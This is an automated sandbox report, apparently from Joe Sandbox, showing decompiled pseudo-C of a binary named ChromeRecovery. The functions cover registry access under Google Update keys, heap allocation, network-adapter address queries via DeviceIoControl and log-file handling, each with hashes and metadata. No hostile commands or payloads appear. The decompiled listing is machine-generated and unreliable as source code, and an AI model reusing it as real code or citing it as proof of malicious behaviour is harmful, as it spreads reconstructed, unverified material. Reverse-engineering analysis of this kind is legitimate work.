					_t11 = _t11 | 0x00000200;
				}
				asm("sbb esi, esi");
				_t28 = ( ~_t25 & 0xffffff00) + 0x200;
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t11,  &_v8); // executed
				if(_t12 > 0) {
					_t12 = _t12 & 0x0000ffff | 0x80070000;
					_t33 = _t12;
				}
				if(_t33 == 0) {
					_t12 =  *((intOrPtr*)( *_t21 + 4))();
					 *((intOrPtr*)(_t21 + 4)) = _v8;
					 *((intOrPtr*)(_t21 + 8)) = _t28;
				}
				return _t12;
			}

0x00c7806f
0x00c78070
0x00c78073
0x00c7807b
0x00c78082
0x00c78088
0x00c7808a
0x00c7808a
0x00c7808e
0x00c78096
0x00c780a5
0x00c780ad
0x00c780b2
0x00c780b7
0x00c780b7
0x00c780b9
0x00c780bf
0x00c780c5
0x00c780c8
0x00c780c8
0x00c780ce

APIs

RegOpenKeyExW.KERNELBASE ref: 00C780A5

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: e96504764f6cf2b34bea99216ae01b9c8874a9a1ceed206a19fbbe892d063652
Instruction ID: 3df6c2d58eee04a9e500eecd888674794a4ecfdb99c0006bd7c6b63526981753
Opcode Fuzzy Hash: e96504764f6cf2b34bea99216ae01b9c8874a9a1ceed206a19fbbe892d063652
Instruction Fuzzy Hash: 39F0C272A10114EBDB048F19DC04BBAB7A8EB44320F11822AFD29D7390DB70EE048794

Uniqueness

Uniqueness Score: -1.00%

Function 00C89696 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C89696(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xca9718, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00C84BF4();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00C83544())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E00C83A28(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x00c8969c
0x00c896a1
0x00c896af
0x00c896af
0x00c896b5
0x00c896b7
0x00c896b7
0x00c896ce
0x00c896d7
0x00c896df
0x00000000
0x00000000
0x00c896bf
0x00c896c1
0x00c896e3
0x00c896e8
0x00c896ee
0x00000000
0x00c896ee
0x00c896c4
0x00c896ca
0x00c896cc
0x00000000
0x00000000
0x00c896cc
0x00000000
0x00c896ce
0x00c896a7
0x00c896ad
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00C893F4,00000001,00000364,?,00000006,000000FF,?,00C83549,00C830CD), ref: 00C896D7

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d64b9aaff1997d13977605bd5d9f15401d0f5f03f4b4f186833375309c8a03f3
Instruction ID: 6a7a4b7898f8c800eabec207ae71cb78d1af303d502ec04350659bd9d8858eb0
Opcode Fuzzy Hash: d64b9aaff1997d13977605bd5d9f15401d0f5f03f4b4f186833375309c8a03f3
Instruction Fuzzy Hash: 1FF059315042216BDB617B22DC01FBF7798EF41778B2C5111B814D6090EA30DE0097EC

Uniqueness

Uniqueness Score: -1.00%

Function 00C89617 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C89617(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00C83544())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xca9718, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00C84BF4();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00C83A28(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x00c8961d
0x00c89623
0x00c89655
0x00c8965a
0x00c89660
0x00000000
0x00c89660
0x00c89627
0x00c89629
0x00c89629
0x00c89640
0x00c89649
0x00c89651
0x00000000
0x00000000
0x00c89631
0x00c89633
0x00000000
0x00000000
0x00c89636
0x00c8963c
0x00c8963e
0x00000000
0x00000000
0x00c8963e
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00C8A030,?,?,00C8A030,00000220,?,?,?), ref: 00C89649

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f7e7dbf2b24ae9bbc5f458e7d78bc148dd346088a9f90737dbeffb63209c193a
Instruction ID: f6519202045aeafe9a229776b399603dd9de9c780979ea023126de69c4e0c176
Opcode Fuzzy Hash: f7e7dbf2b24ae9bbc5f458e7d78bc148dd346088a9f90737dbeffb63209c193a
Instruction Fuzzy Hash: 6BE0ED21500620ABDB613BA68C09BBB7A8CDB417ACF180121FC29A6090FB30CE0097AC

Uniqueness

Uniqueness Score: -1.00%

Function 00C78413 Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00C78413(void* __ecx, WCHAR* _a4, void* _a8) {
				int _v8;
				int _v12;
				signed short _t11;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_v8 = 4;
				_t8 = _t14 + 4; // 0xc77f74, executed
				_t11 = SHQueryValueExW( *_t8, _a4, 0,  &_v12, _a8,  &_v8); // executed
				if(_t11 > 0) {
					return _t11 & 0x0000ffff | 0x80070000;
				}
				return _t11;
			}

0x00c78413
0x00c78416
0x00c78417
0x00c78418
0x00c78426
0x00c78433
0x00c78436
0x00c7843e
0x00000000
0x00c78443
0x00c78449

APIs

SHQueryValueExW.SHLWAPI(00C77F74,00000000,00000000,00000000,?,00000000,00CA41C0,00CA41C0,?,00C78347,IsEnrolledToDomain,?,00000000,00000000,?,HKLM\Software\Google\UpdateDev\), ref: 00C78436

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cfee5fb6d4a413d61873988bb1c00ad41aff2f68871a19132085ebeab5baa7be
Instruction ID: a16db8e90bb16de68822b38a8c4bc0d73148b803d3adfa616a6b7d7013caaeb5
Opcode Fuzzy Hash: cfee5fb6d4a413d61873988bb1c00ad41aff2f68871a19132085ebeab5baa7be
Instruction Fuzzy Hash: 6AE01A70120109BAEB008B40CD06BEE7AACEB00318F108055B508E5150D779DA049B64

Uniqueness

Uniqueness Score: -1.00%

Function 00C77F44 Relevance: 1.5, APIs: 1, Instructions: 17
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C77F44(void* __ecx, short* _a4) {
				signed short _t3;

				_t3 = RegDeleteValueW( *(__ecx + 4), _a4); // executed
				if(_t3 > 0) {
					_t3 = _t3 & 0x0000ffff | 0x80070000;
				}
				if(_t3 == 0x80070002 || _t3 == 0x80070003) {
					return 1;
				}
				return _t3;
			}

0x00c77f4d
0x00c77f55
0x00c77f5a
0x00c77f5a
0x00c77f64
0x00000000
0x00c77f6f
0x00c77f71

APIs

RegDeleteValueW.KERNELBASE ref: 00C77F4D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DeleteValue
String ID:
API String ID: 1108222502-0
Opcode ID: b44d7429723b658a0911b073bcab25dabfedcf58ed104492d852d3ef06eca7ee
Instruction ID: 54939f05b0b4bb339cbe3754cff49764642e06b0ff178501938a2ec1665bbf80
Opcode Fuzzy Hash: b44d7429723b658a0911b073bcab25dabfedcf58ed104492d852d3ef06eca7ee
Instruction Fuzzy Hash: 8CD0A73105810996CB1155F1CE067357AC99B00320F20C627F02DC8131C51FC9B056D9

Uniqueness

Uniqueness Score: -1.00%

Function 00C77F14 Relevance: 1.5, APIs: 1, Instructions: 17
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C77F14(void* __ecx, short* _a4) {
				signed short _t3;

				_t3 = RegDeleteKeyW( *(__ecx + 4), _a4); // executed
				if(_t3 > 0) {
					_t3 = _t3 & 0x0000ffff | 0x80070000;
				}
				if(_t3 == 0x80070002 || _t3 == 0x80070003) {
					return 1;
				}
				return _t3;
			}

0x00c77f1d
0x00c77f25
0x00c77f2a
0x00c77f2a
0x00c77f34
0x00000000
0x00c77f3f
0x00c77f41

APIs

RegDeleteKeyW.ADVAPI32(?,000F003F), ref: 00C77F1D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Delete
String ID:
API String ID: 1035893169-0
Opcode ID: 67d65e4be91bb992563f66239e7e44a79fb8702ade6564c0b17677b0af5b859e
Instruction ID: 83be10b20ef3ce922a65cbd473c8cfb54e45ab3cc753b19cfaced9b1ea9b7e5e
Opcode Fuzzy Hash: 67d65e4be91bb992563f66239e7e44a79fb8702ade6564c0b17677b0af5b859e
Instruction Fuzzy Hash: 08D0A731068009A7CB1115B19E067393AC99700620F20C66BF05DC8031C12BC5A156D9

Uniqueness

Uniqueness Score: -1.00%

Function 00C77F74 Relevance: 1.5, APIs: 1, Instructions: 15
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C77F74(void* __ecx) {
				signed short _t7;
				void* _t10;

				_t10 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t2 = _t10 + 4; // 0xc77f74, executed
					_t7 = RegCloseKey( *_t2); // executed
					if(_t7 > 0) {
						_t7 = _t7 & 0x0000ffff | 0x80070000;
					}
					 *(_t10 + 4) =  *(_t10 + 4) & 0x00000000;
					 *((intOrPtr*)(_t10 + 8)) = 0x200;
					return _t7;
				}
				return 0;
			}

0x00c77f75
0x00c77f7c
0x00c77f7e
0x00c77f81
0x00c77f89
0x00c77f8e
0x00c77f8e
0x00c77f93
0x00c77f97
0x00000000
0x00c77f97
0x00c77f9f

APIs

RegCloseKey.KERNELBASE(00C77F74), ref: 00C77F81

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8eacdda4ef60bb5fae33f39d5233199119b6979f2f18a585a61255773b2db47a
Instruction ID: d47c54bb97bb9570ba1743ad5e45c3c1944947754bda5ca56e87c4870aef5d73
Opcode Fuzzy Hash: 8eacdda4ef60bb5fae33f39d5233199119b6979f2f18a585a61255773b2db47a
Instruction Fuzzy Hash: AAD05E314197228FD3205A21DA0836376D26B00712F10CD6EE0AAC6560C774D8408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C7483D Relevance: 1.3, APIs: 1, Instructions: 12
stringCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00C7483D(WCHAR** __ecx, void* __esi, WCHAR* _a4) {
				intOrPtr* _v4;
				void* __ebp;
				int _t16;
				intOrPtr* _t18;
				intOrPtr* _t21;
				intOrPtr _t24;
				intOrPtr* _t27;
				void* _t30;

				if(_a4 == 0) {
					_push(0x80004005);
					E00C71185(__ecx);
					asm("int3");
					_t18 = __ecx;
					_t24 =  *_v4;
					_t27 =  *__ecx - 0x10;
					_t21 = _t24 - 0x10;
					if(_t21 != _t27) {
						if( *((intOrPtr*)(_t27 + 0xc)) < 0 ||  *_t21 !=  *_t27) {
							_push( *((intOrPtr*)(_t24 - 0xc)));
							L00C71A21(_t18, _t24, _t24);
						} else {
							_t30 = E00C71B55(_t21, __esi);
							E00C713C0(_t13, _t27);
							_t6 = _t30 + 0x10; // 0x10
							 *_t18 = _t6;
						}
					}
					return _t18;
				} else {
					_t16 = lstrcmpiW( *__ecx, _a4); // executed
					return _t16;
				}
			}

0x00c74844
0x00c74855
0x00c7485a
0x00c7485f
0x00c74867
0x00c7486a
0x00c7486e
0x00c74871
0x00c74876
0x00c7487c
0x00c7489b
0x00c748a1
0x00c74884
0x00c7488c
0x00c7488e
0x00c74893
0x00c74896
0x00c74898
0x00c7487c
0x00c748ab
0x00c74846
0x00c7484b
0x00c74852
0x00c74852

APIs

lstrcmpiW.KERNEL32(00000000,00000000), ref: 00C7484B

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: c7d6f7c800654fb1b1852e0c93166f1064b0fe4ef62fea6937c349158f6a468c
Instruction ID: d0ecb39fb5a63d672f9b2c528d41477187cf863a5c1d9848fc71e96584bea2ce
Opcode Fuzzy Hash: c7d6f7c800654fb1b1852e0c93166f1064b0fe4ef62fea6937c349158f6a468c
Instruction Fuzzy Hash: DCC0127200050CFBDB166B94DC0CBA87BA8EB00318F54C029BB2C68870873245A0EAAA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C79D31 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 178
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00C79D31(intOrPtr __ecx, void* __edx, intOrPtr __edi, void* __eflags) {
				signed int _v8;
				void _v16;
				char _v32;
				short _v540;
				char _v544;
				void* _v548;
				intOrPtr _v552;
				signed int _v556;
				char _v560;
				char _v564;
				long _v568;
				intOrPtr _v572;
				signed int _v576;
				char _v580;
				void _v584;
				intOrPtr _v588;
				char _v592;
				void* _v596;
				intOrPtr _v600;
				char _v640;
				char _v644;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t66;
				void* _t68;
				intOrPtr _t72;
				int _t77;
				int _t82;
				int _t91;
				int _t98;
				int _t101;
				void* _t107;
				void* _t109;
				int _t115;
				void* _t127;
				long _t132;
				int _t133;
				void** _t142;
				void* _t152;
				void* _t159;
				int _t160;
				signed int _t162;
				void* _t164;

				_t156 = __edi;
				_t152 = __edx;
				_t66 =  *0xca8008; // 0x617e0cdd
				_v8 = _t66 ^ _t162;
				_v576 = _v576 & 0x00000000;
				_push(__edi);
				_v588 = __ecx;
				_v580 = 0xca41c0;
				_v572 = 0x200;
				_t68 = E00C780D1( &_v580, __edx, __eflags, L"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkCards", 0x20019);
				_t158 = _t68;
				if(_t68 < 0) {
					L18:
					_v580 = 0xca41c0;
					E00C77F74( &_v580);
					return E00C7F35B(_v8 ^ _t162);
				} else {
					_t72 = E00C78C74( &_v580);
					_t115 = 0;
					_v600 = _t72;
					if(_t72 == 0) {
						L17:
						_t158 = 0;
						goto L18;
					} else {
						do {
							E00C71AD8( &_v564, _t152, E00C713D8());
							if(E00C78C99( &_v580, _t152, _t156, _t158, _t115,  &_v564) >= 0) {
								_t156 = _v564;
								_v556 = _v556 & 0x00000000;
								_v560 = 0xca41c0;
								_v552 = 0x200;
								_t77 = E00C7806C( &_v560, _v576, _t156, 0x20019);
								__eflags = _t77;
								if(_t77 < 0) {
									L15:
									_v560 = 0xca41c0;
									_t76 = E00C77F74( &_v560);
									_t127 = _t156 - 0x10;
									goto L16;
								} else {
									E00C71AD8( &_v544, _t152, E00C713D8());
									_t82 = E00C784EE( &_v560, _t152, L"ServiceName",  &_v544);
									__eflags = _t82;
									if(_t82 < 0) {
										L14:
										E00C713C0(_t82, _v544 - 0x10);
										goto L15;
									} else {
										E00C79C43( &_v540, 0x104, 0x103, L"\\\\.\\%s", _v544);
										_t164 = _t164 + 0x14;
										_t158 = CreateFileW( &_v540, 0x80000000, 7, 0, 3, 0, 0);
										_v596 = _t158;
										__eflags = _t158 - 0xffffffff;
										if(_t158 != 0xffffffff) {
											_t132 = 6;
											_v584 = 0x1010101;
											_v568 = _t132;
											_t91 = DeviceIoControl(_t158, 0x170002,  &_v584, 4,  &_v16, _t132,  &_v568, 0);
											__eflags = _t91;
											if(_t91 == 0) {
												L12:
												E00C77ED7();
												_t82 = CloseHandle(_t158);
												goto L13;
											} else {
												__eflags = _v568 - 6;
												if(_v568 != 6) {
													goto L12;
												} else {
													_t133 = E00C713D8();
													__eflags = _t133;
													if(_t133 == 0) {
														_push(0x80004005);
														E00C71185(_t133);
														asm("int3");
														_push(_t162);
														_push(_t115);
														_push(_t158);
														_t159 = _t152;
														E00C75CB4( &_v644, __eflags);
														E00C76162(L"{D19BAF17-7C87-467E-8D63-6C4B1C836373}", _t133, __eflags,  &_v644);
														_t98 = E00C77A67( &_v640);
														 *(_t159 + 4) = _t98;
														__eflags = _t98;
														if(_t98 != 0) {
															L23:
															_t160 = 0;
															__eflags = 0;
														} else {
															_t101 = E00C77A67(0);
															 *(_t159 + 4) = _t101;
															__eflags = _t101;
															if(_t101 != 0) {
																goto L23;
															} else {
																_t160 = E00C77ED7();
															}
														}
														E00C75CDD( &_v32, __eflags);
														return _t160;
													} else {
														_v548 =  *((intOrPtr*)( *_t133 + 0xc))() + 0x10;
														E00C7725E( &_v548);
														_t107 = E00C77222(_t115,  &_v548, 9);
														_t142 =  &_v548;
														E00C772FB(_t115, _t142, 9);
														_push(_t142);
														_push(_t142);
														_t109 = E00C775DD( &_v16, _t107, 9);
														_t164 = _t164 + 0x10;
														E00C777DC( &_v548, _t109);
														_t158 = _v548;
														_t152 = _v548;
														E00C713C0(E00C713C0(E00C751B3(_v588, E00C774C5( &_v592, _t152,  *((intOrPtr*)(_v548 - 0xc)))), _v592 - 0x10), _t158 - 0x10);
														_t82 = CloseHandle(_v596);
														L13:
														goto L14;
													}
												}
											}
										} else {
											_t82 = E00C77ED7();
											goto L14;
										}
									}
								}
							} else {
								_t127 = _v564 + 0xfffffff0;
								goto L16;
							}
							goto L25;
							L16:
							E00C713C0(_t76, _t127);
							_t115 = _t115 + 1;
						} while (_t115 < _v600);
						goto L17;
					}
				}
				L25:
			}

0x00c79d31
0x00c79d31
0x00c79d3a
0x00c79d41
0x00c79d44
0x00c79d4d
0x00c79d53
0x00c79d64
0x00c79d6e
0x00c79d78
0x00c79d7d
0x00c79d81
0x00c79fd1
0x00c79fd7
0x00c79fe1
0x00c79ff6
0x00c79d87
0x00c79d8d
0x00c79d92
0x00c79d94
0x00c79d9c
0x00c79fcf
0x00c79fcf
0x00000000
0x00c79da2
0x00c79da2
0x00c79dae
0x00c79dc8
0x00c79dd8
0x00c79de4
0x00c79df7
0x00c79e01
0x00c79e0b
0x00c79e10
0x00c79e12
0x00c79fa5
0x00c79fab
0x00c79fb5
0x00c79fba
0x00000000
0x00c79e18
0x00c79e24
0x00c79e3b
0x00c79e40
0x00c79e42
0x00c79f97
0x00c79fa0
0x00000000
0x00c79e48
0x00c79e64
0x00c79e69
0x00c79e88
0x00c79e8a
0x00c79e90
0x00c79e93
0x00c79ea1
0x00c79eaa
0x00c79eb9
0x00c79ecf
0x00c79ed5
0x00c79ed7
0x00c79f8b
0x00c79f8b
0x00c79f91
0x00000000
0x00c79edd
0x00c79edd
0x00c79ee4
0x00000000
0x00c79eea
0x00c79eef
0x00c79ef1
0x00c79ef3
0x00c79ff7
0x00c79ffc
0x00c7a001
0x00c7a002
0x00c7a008
0x00c7a00e
0x00c7a00f
0x00c7a011
0x00c7a021
0x00c7a02d
0x00c7a032
0x00c7a035
0x00c7a037
0x00c7a053
0x00c7a053
0x00c7a053
0x00c7a039
0x00c7a03e
0x00c7a043
0x00c7a046
0x00c7a048
0x00000000
0x00c7a04a
0x00c7a04f
0x00c7a04f
0x00c7a048
0x00c7a058
0x00c7a062
0x00c79ef9
0x00c79f07
0x00c79f0d
0x00c79f1a
0x00c79f21
0x00c79f29
0x00c79f2e
0x00c79f2f
0x00c79f36
0x00c79f3b
0x00c79f45
0x00c79f4a
0x00c79f56
0x00c79f7e
0x00c79f91
0x00c79f91
0x00000000
0x00c79f91
0x00c79ef3
0x00c79ee4
0x00c79e95
0x00c79e95
0x00000000
0x00c79e95
0x00c79e93
0x00c79e42
0x00c79dca
0x00c79dd0
0x00000000
0x00c79dd0
0x00000000
0x00c79fbd
0x00c79fbd
0x00c79fc2
0x00c79fc3
0x00000000
0x00c79da2
0x00c79d9c
0x00000000

APIs

Part of subcall function 00C78C74: RegQueryInfoKeyW.ADVAPI32(00C77F74,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C78C8E

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

Part of subcall function 00C78C99: RegEnumKeyExW.KERNELBASE(00C77F74,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C78CD5

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00C79E82

Strings

ServiceName, xrefs: 00C79E30
HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkCards, xrefs: 00C79D5F
HKLM\Software\Google\Update\, xrefs: 00C79D4C
\\.\%s, xrefs: 00C79E54

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CreateEnumFileHeapInfoProcessQuery
String ID: HKLM\Software\Google\Update\$HKLM\Software\Microsoft\Windows NT\CurrentVersion\NetworkCards$ServiceName$\\.\%s
API String ID: 708949789-1625122553
Opcode ID: 9e55d22107ec71b1ae7002b178de09747715e2ca8438fc2ef866c2e82661b5b6
Instruction ID: df7e0cb2fb564ee9a85b78fde78a6b55ca54a33b3f899060d8d2e2f8236f9bff
Opcode Fuzzy Hash: 9e55d22107ec71b1ae7002b178de09747715e2ca8438fc2ef866c2e82661b5b6
Instruction Fuzzy Hash: 0D619E70941229ABDB24EBA4DC9ABEDB778EF04304F1081D8E91DA6191DB706F88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C741A3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00C741A3(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				void _v44;
				char _v140;
				struct _OVERLAPPED* _v144;
				long _v152;
				char _v156;
				WCHAR** _v160;
				char _v192;
				void* __ebp;
				signed int _t45;
				void* _t53;
				signed char _t58;
				int _t63;
				signed char _t72;
				long _t74;
				long _t75;
				long _t84;
				signed int _t90;
				char* _t98;
				WCHAR** _t114;
				signed int _t116;

				_t45 =  *0xca8008; // 0x617e0cdd
				_v8 = _t45 ^ _t116;
				_t84 = __ecx;
				_v152 = __ecx;
				_t114 = __ecx + 0x14;
				_v156 = 0;
				_v144 = 0;
				_v160 = _t114;
				E00C75138( *_t114,  &_v144, __edi, _t114);
				_t122 = _v144 -  *((intOrPtr*)(__ecx + 4));
				if(_v144 >  *((intOrPtr*)(__ecx + 4))) {
					E00C743CE(__ecx, _t122);
				}
				_t53 = CreateFileW( *_t114, 0x40000000, 3, 0, 2 + (0 |  *((intOrPtr*)(_t84 + 0xa)) != 0x00000000) * 2, 0x80, 0);
				 *(_t84 + 0x18) = _t53;
				if(_t53 != 0xffffffff) {
					_t107 = _t114;
					E00C77C6B( &_v144, _t114, __eflags);
					_t115 = _v144;
					_t90 = 9;
					memset( &_v44, 0, _t90 << 2);
					_t58 = GetFileAttributesExW(_v144, 0,  &_v44);
					__eflags = _t58;
					if(_t58 != 0) {
						__eflags = _v44 >> 0x0000000a & 0x00000001;
						if(__eflags != 0) {
							L6:
							_push( *((intOrPtr*)(_t84 + 0x14)));
							_push( *((intOrPtr*)(_t84 + 0x1c)));
							_push(L"LOG_SYSTEM: [%s]: ERROR - Log path %s has a reparse point");
							OutputDebugStringW(E00C76CB8(__eflags));
							_t63 = CloseHandle( *(_t84 + 0x18));
							 *(_t84 + 0x18) = 0;
							L7:
							E00C713C0(_t63, _t115 - 0x10);
							goto L8;
						}
						__eflags = E00C72E47( *(_t84 + 0x18), 0, _t115);
						if(__eflags != 0) {
							goto L6;
						}
						E00C72870( &_v192);
						_push(0x221);
						_push(0x20);
						E00C724B7(_t84, _t107, 0, _t115, __eflags,  &_v140, 0xca35c8, 2);
						_t72 = E00C728ED( &_v192, __eflags,  &_v140, 0xc0010000, 0);
						_t98 =  &_v140;
